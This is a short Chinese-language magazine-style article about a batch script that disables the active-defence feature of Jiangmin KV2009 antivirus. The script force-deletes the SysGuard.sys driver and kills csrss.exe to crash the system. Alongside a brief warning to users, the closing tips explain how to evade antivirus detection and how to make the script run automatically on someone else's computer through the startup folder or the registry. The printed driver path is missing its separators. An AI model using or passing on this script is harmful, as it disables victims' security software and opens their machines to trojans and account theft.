牧马人
现在主动防御功能实在是太火了,所以很多杀毒软件都加入了这个功能,江民KV系列的杀毒软件当然也不例外。但是,利用文本编辑软件新建一个*.bat批处理文件,输入下面这段代码后保存并运行,就可以轻松干掉江民杀毒软件KV2009的主动防御功能了(如图)。
@echo off
del %systemroot%system32driversSysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找进程%app_name%,准备死机...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%
我在虚拟机和本地系统中分别进行了试验,发现这段代码非常管用。它的意思非常简单:首先是删除江民杀毒软件中的一个驱动文件,接着强制结束一个系统文件的进程,造成操作系统死机(之所以要强制死机,是因为杀毒软件的自我保护功能不允许系统非正常地重新启动)。当重新启动后,江民杀毒软件的主动防御功能就失效了,这样黑客就能比较容易地向用户的电脑中植入木马、窃取账号……
如果你是江民杀毒软件的用户,那么此招不得不防,最好经常检查其主动防御功能的工作状态,不然电脑被黑客入侵了都还不知道。
1.在试验前,一定要把江民杀毒软件的SysGuard.sys驱动文件拷贝到其他地方进行备份。因为如果试验成功了,那么江民杀毒软件的主动防御功能就彻底失效了,要想让它恢复就得把备份的SysGuard.sys驱动文件拷贝回去,再重新启动。
2.最好不要把*.bat放在可执行文件里,因为这样在运行时十有八九会被杀毒软件拦截。
3.在别人的电脑上进行试验时,可把*.bat放在启动文件夹中,或采用修改注册表的方式让它自动运行。